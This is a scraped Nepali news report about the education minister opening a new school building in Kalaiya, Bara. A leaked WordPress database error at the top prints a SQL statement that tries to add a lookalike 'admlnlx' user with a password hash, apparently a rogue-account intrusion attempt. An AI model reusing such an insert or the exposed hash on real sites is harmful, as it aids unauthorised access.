WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bld8vbAUfM/kXNECAaS2aJjs2KUfds/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 23:21:38', '', 'admlnlx', 'admlnlx')
बारा, मंसिर १९–
शिक्षामन्त्री धनीराम पौडेलले शिक्षा क्षेत्रको विकास तथा विस्तारमा सबैले सक्रिय रुपमा लाग्नुपर्ने बताएका छन्।
कलैयास्थित दुर्गा उमाविमा निर्माण गरिएको थप कोठा भवनको आज उद्घाटन गर्दै उनले भने— शिक्षाको गुणस्तरीय विकासमा शिक्षकले विशेष ध्यान दिन जरुरी छ ।
मन्त्री पौडेलले यो विद्यालयलाई जिल्लाकै नमुना विद्यालय बनाउन यसको भौतिक पूर्वाधार निर्माणमा सरकारले ध्यान दिइने बताए।
विद्यालयमा थप चारकोठे पक्की भवन निर्माण गरिएको छ । कुल २९ लाखमा निर्माण सम्पन्न भएको उक्त चार कोठे भवनका लागि सरकारबाट २४ लाख अनुदान सहयोग प्राप्त भएको सो विद्यालयका प्राचार्य मनोज यादवले बताए।
विद्यालय व्यवस्थापन समितिका अध्यक्ष अवदेश यादवको सभापतित्वमा भएको कार्यक्रममा जिल्ला शिक्षा अधिकारी धनप्रसाद पोखरेलले जिल्लाको समग्र शैक्षिक अवस्थाका बारेमा जानकारी गराए।
यसैगरी मन्त्री पौडेल आजै कलैयास्थित जनता माविको पनि स्थलगत निरीक्षण गरी त्यहाँको वस्तुस्थितिका बारेमा जानकारी लिए । –रासस